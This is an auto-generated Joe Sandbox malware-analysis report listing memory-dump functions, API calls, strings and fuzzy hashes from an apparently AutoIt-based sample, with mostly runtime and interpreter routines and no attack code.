Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 6e0f23a6701a1578c5aad48b9f45db8bdf550c83a7d4e8de24b6be8fbbf0affa
Instruction ID: ba2e707fe5a51d3eb44e803a1ecdc3ecd29629b42aafedb12bd5b8120b5ff7aa
Opcode Fuzzy Hash: 6e0f23a6701a1578c5aad48b9f45db8bdf550c83a7d4e8de24b6be8fbbf0affa
Instruction Fuzzy Hash: D5515BB1904259AFDF249F64DC41AEEBBB9FF48304F0004AEB649A3242DB715A94CF59

Function 0005563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0005569B
_memcpy_s.LIBCMT ref: 0005570D
__read_nolock.LIBCMT ref: 0005576B
__filbuf.LIBCMT ref: 0005578E
_memset.LIBCMT ref: 000557D2

Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: d68d1a7ccfd875965e6adb5307bd5c0f347dedeb7f9466e717c31fc8a992a5e6
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: B351EF30A04B49DBDB248EA9DCA46AF77F5AF08323F248769FC25972D1D7709D588B40

Function 000352B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003534A
TranslateMessage.USER32(?), ref: 00035356
DispatchMessageW.USER32(?), ref: 00035360

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: e1bef0330228b6c5af29d87c54f66e053925cfefbdac4fe85cf9c948e34f68e9
Instruction ID: e7bba6337ec5288e4591b120ac2a122d2c19d0a692a4b8d4683ec010490b7de1
Opcode Fuzzy Hash: e1bef0330228b6c5af29d87c54f66e053925cfefbdac4fe85cf9c948e34f68e9
Instruction Fuzzy Hash: 21312630A08B06DBFBB28B64DC44FBA77FC9B01345F14006AE426875F1D7B9A985E752

Function 000957FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0009581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00095829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00095831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0009583B
Sleep.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00095877

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 55a6072b4d62a1c938715f28eb3011a016e7690ebd5b4114f9a54209152779fa
Instruction ID: efa80cfab31ab9c8157bf8b9f920afb35897a5ad5d6cc9fc321f518d35a5b6bf
Opcode Fuzzy Hash: 55a6072b4d62a1c938715f28eb3011a016e7690ebd5b4114f9a54209152779fa
Instruction Fuzzy Hash: D8015771C01A19DBEF009FEAEC48AEEBBB8BB0C712F114156E901B2140CF349550DBA1

Function 00031284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312EB

Strings

Control Panel\Mouse, xrefs: 000312A6

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 1990f061bdca1019612336d8b3d2b77f321cd93d9df41b3fdecec133b90086b2
Instruction ID: 6176f820b31448ef6aa525d341e9889d06d2f5e88a89cb928018b2129adf51ce
Opcode Fuzzy Hash: 1990f061bdca1019612336d8b3d2b77f321cd93d9df41b3fdecec133b90086b2
Instruction Fuzzy Hash: 47111575614208FFEB218FA4DC84EEFBBBCEF09741F104569E805E7210E6719E509BA0

Function 00045B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00045B58

Part of subcall function 000456F8: _memset.LIBCMT ref: 00045787
Part of subcall function 000456F8: _wcscpy.LIBCMT ref: 000457DB
Part of subcall function 000456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000457EB

KillTimer.USER32(?,00000001,?,?), ref: 00045BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00045BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00080D7C

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ad0f2b8503943c5fc8f38344fdf1edef7f5e659937ba89abb4bb68cdf0a59b7e
Instruction ID: cb66d12a97abbeb3d9b4339955df3d19fc3f780d57ab0a303b4afbb0de7a9613
Opcode Fuzzy Hash: ad0f2b8503943c5fc8f38344fdf1edef7f5e659937ba89abb4bb68cdf0a59b7e
Instruction Fuzzy Hash: AF210AB09047849FE7B29B248C95FEBBBECAF01305F00049DE6DD57182C3742988CB85

Function 0004278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 000449C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,000427AF,?,00000001), ref: 000449F4

_free.LIBCMT ref: 0007FB04
_free.LIBCMT ref: 0007FB4B

Part of subcall function 000429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00042ADF

Strings

Bad directive syntax error, xrefs: 0007FB33

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 9c263acf90c182d8c6f78126cd44a87562d1b447c934648a43ad6272db8a636e
Instruction ID: 092eb1fd74eefa93d6feec835a028e2b3589761e852520520cf5c36e62b85d37
Opcode Fuzzy Hash: 9c263acf90c182d8c6f78126cd44a87562d1b447c934648a43ad6272db8a636e
Instruction Fuzzy Hash: A0916EB1D1021AAFCF14EFA4C8919EEB7B4FF05310F14857AF819AB292DB74A905CB54

Function 00099CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00044AB2: __fread_nolock.LIBCMT ref: 00044AD0

_wcscmp.LIBCMT ref: 00099DE1
_wcscmp.LIBCMT ref: 00099DF4

Strings

FILE, xrefs: 00099D2D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 2fe8026ad8666bd67d105b13ce2db656c4bb0b8530be2431cab76a08efa1a133
Instruction ID: c390ff84c6df20547ecfadf40fdc6a5b61170b2a0b886ac8c0ebd374882c864b
Opcode Fuzzy Hash: 2fe8026ad8666bd67d105b13ce2db656c4bb0b8530be2431cab76a08efa1a133
Instruction Fuzzy Hash: 0341E572A40209BADF20EAA4CC45FEFBBFDEF49714F00047AFA00B7191D671A9049B65

Function 000431BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0008032B
GetOpenFileNameW.COMDLG32(?), ref: 00080375

Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4

Part of subcall function 000509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000509E4

Strings

X, xrefs: 00080343

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 894ed2ecdba00a4ef1a9d8ac7af84c12e2dccace0c7321509e46de17466d7614
Instruction ID: abe95fd634807d1b96db9f1bd5afc28fc4c86057bb2217198c00148821420381
Opcode Fuzzy Hash: 894ed2ecdba00a4ef1a9d8ac7af84c12e2dccace0c7321509e46de17466d7614
Instruction Fuzzy Hash: 5E218471A042889BDB41DF94C845BEE7BF8AF49300F00406AE804A7242DBB95A8CDF91

Function 000AD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf744b02d9db998a224b4ba7b33b28e8ec1024526a547877b394274008b39e2
Instruction ID: c0589fb4d0f3624026d92c81a395d4526197454fa29658a1f2d7867a9e74a88f
Opcode Fuzzy Hash: 6cf744b02d9db998a224b4ba7b33b28e8ec1024526a547877b394274008b39e2
Instruction Fuzzy Hash: D3F12871A083019FC714DF68C484A6ABBE5FF89314F14892EF89A9B352D730E945CF82

Function 00041680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000416DB
_memmove.LIBCMT ref: 0004174C
_memmove.LIBCMT ref: 000417B9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 375adbc4a62f4bea9ab610775eeacea4eaebb844cb9f39939c604d006e1c3bdd
Instruction ID: 6f95e6c6e7cce629996034b1801edfa72e4c7ca41f63341f2542a58a59b4ae89
Opcode Fuzzy Hash: 375adbc4a62f4bea9ab610775eeacea4eaebb844cb9f39939c604d006e1c3bdd
Instruction Fuzzy Hash: 7861AEB1A00209EBDF048F25D880AAE7BB5FF44350F15C1A9EC19CF295EB35DAA0CB55

Function 0003AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 000507BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000507EC
Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 000507F4
Part of subcall function 000507BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000507FF
Part of subcall function 000507BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0005080A
Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00050812
Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0005081A

Part of subcall function 0004FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0003AC6B), ref: 0004FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003AD08
OleInitialize.OLE32(00000000), ref: 0003AD85
CloseHandle.KERNEL32(00000000), ref: 00072F56

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 976f9795cc2f77640b4a88b73c62f92310e6b8d16dfd900cc0dca833e925f50b
Instruction ID: e068a0cd82742c47a6656848085339af6740d4036822bafd8556b2deb423970a
Opcode Fuzzy Hash: 976f9795cc2f77640b4a88b73c62f92310e6b8d16dfd900cc0dca833e925f50b
Instruction Fuzzy Hash: 7081C9B091C2408EE384EF29ED446B97EE8EB88304700816AD51CC7A72E7BC6515FF17

Function 000459D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000459F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00045A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00045ABB

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: cde2b107cc401f9eede1a4f0d14d9e62ad3ec887070f97789d07110fac46b430
Instruction ID: 35fd8c92f21be7980e01abde6d9bc40bfd292c554116002a665ec88a615b8085
Opcode Fuzzy Hash: cde2b107cc401f9eede1a4f0d14d9e62ad3ec887070f97789d07110fac46b430
Instruction Fuzzy Hash: F53193B0505B018FD761DF24DC846ABBBE4FB48305F000A3EF59A83282E775A954CB97

Function 0005593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00055953

Part of subcall function 0005A39B: __NMSG_WRITE.LIBCMT ref: 0005A3C2
Part of subcall function 0005A39B: __NMSG_WRITE.LIBCMT ref: 0005A3CC

__NMSG_WRITE.LIBCMT ref: 0005595A

Part of subcall function 0005A3F8: GetModuleFileNameW.KERNEL32(00000000,000F53BA,00000104,00000004,00000001,00051003), ref: 0005A48A
Part of subcall function 0005A3F8: ___crtMessageBoxW.LIBCMT ref: 0005A538

Part of subcall function 000532CF: ___crtCorExitProcess.LIBCMT ref: 000532D5
Part of subcall function 000532CF: ExitProcess.KERNEL32 ref: 000532DE

Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58

RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,?,00000004,?,?,00051003,?), ref: 0005597F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: ee7e39663a587a61eb418efc5d44a449f8ed31e96fab8804bc32d1d837a3a7db
Instruction ID: a028c6e9cd90bc8655739f02afb37f42027aead124352db32f51121fe6874f94
Opcode Fuzzy Hash: ee7e39663a587a61eb418efc5d44a449f8ed31e96fab8804bc32d1d837a3a7db
Instruction Fuzzy Hash: B601F531315F01DAE6512B24EC22AAF3398DF43773F100526FD14AA5D2DE789D088771

Function 000992C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000992D6

Part of subcall function 00052F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052F99
Part of subcall function 00052F85: GetLastError.KERNEL32(00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052FAB

_free.LIBCMT ref: 000992E7
_free.LIBCMT ref: 000992F9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: d26d73d7d0571f56dbe63cbd36fb74be7a2f7cbee912abaa28de39e816de5cc7
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 99E017A160970267CE64A67CB980ED3B7FC4F89752F15093EB809D7183CE24E8459268

Function 00035E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 0006E234

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: a2e750defdcd9e5b2e202765e661831f39db3582b756f2fd13f7938a966f8807
Instruction ID: c6121349c60ae5d2a2741658d050c4a4d7a96772e47eed75017f28d4c43d448f
Opcode Fuzzy Hash: a2e750defdcd9e5b2e202765e661831f39db3582b756f2fd13f7938a966f8807
Instruction Fuzzy Hash: C0327974608341DFDB25DF14C490A6EB7E6BF85300F15896DE88A8B362D736ED85CB82

Function 000B5BD1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

GetWindowTextW.USER32(?,?,00007FFF), ref: 000B5D1E

Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

Strings

all, xrefs: 000B5C00

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove$Exception@8TextThrowWindowstd::exception::exception
String ID: all
API String ID: 698342025-991457757
Opcode ID: ccbf9ec39a75e4e58678f76b768ce330082c4484f00eb305fb91a631fc7a2ed0
Instruction ID: ab05fb92a47df184abb2defe269c0f6298100d70179eed50549fc3271c7507f6
Opcode Fuzzy Hash: ccbf9ec39a75e4e58678f76b768ce330082c4484f00eb305fb91a631fc7a2ed0
Instruction Fuzzy Hash: EE517871604701AFD715EF20C886FEAB7E9FF48714F004A29F9599B292DB70A944CB92

Function 000448B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000448FA

Strings

EA06, xrefs: 000808A1

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
